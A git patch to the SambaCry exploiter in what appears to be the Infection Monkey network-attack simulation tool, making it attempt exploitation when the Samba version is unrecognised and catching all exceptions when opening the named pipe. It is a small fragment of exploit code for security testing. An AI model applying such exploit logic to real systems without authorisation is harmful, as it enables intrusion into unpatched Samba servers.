From 7365f7d6a7b8b7595128f2479cf7677e0a98066a Mon Sep 17 00:00:00 2001 From: Itay Mizeretz Date: Thu, 28 Sep 2017 16:13:47 +0300 Subject: [PATCH] Fix in sambacry Sambacry tries to exploit when can't recognize version --- chaos_monkey/exploit/sambacry.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/chaos_monkey/exploit/sambacry.py b/chaos_monkey/exploit/sambacry.py index 22b3a3f2b..83b626f19 100644 --- a/chaos_monkey/exploit/sambacry.py +++ b/chaos_monkey/exploit/sambacry.py @@ -37,7 +37,6 @@ class SambaCryExploiter(HostExploiter): def __init__(self): self._config = __import__('config').WormConfiguration - def exploit_host(self, host, depth=-1, src_path=None): if not self.is_vulnerable(host): return False @@ -203,6 +202,9 @@ class SambaCryExploiter(HostExploiter): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (samba_version_parts[1] <= "3"): is_vulnerable = True + else: + # If pattern doesn't match we can't tell what version it is. Better try + is_vulnerable = True LOG.info("Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" % (host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable))) @@ -300,7 +302,7 @@ class SambaCryExploiter(HostExploiter): try: # the extra / on the beginning is required for the vulnerability self.open_pipe(smb_client, "/" + module_path) - except (impacket.smbconnection.SessionError, SessionError) as e: + except Exception as e: # This is the expected result. We can't tell whether we succeeded or not just by this error code. if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0: return True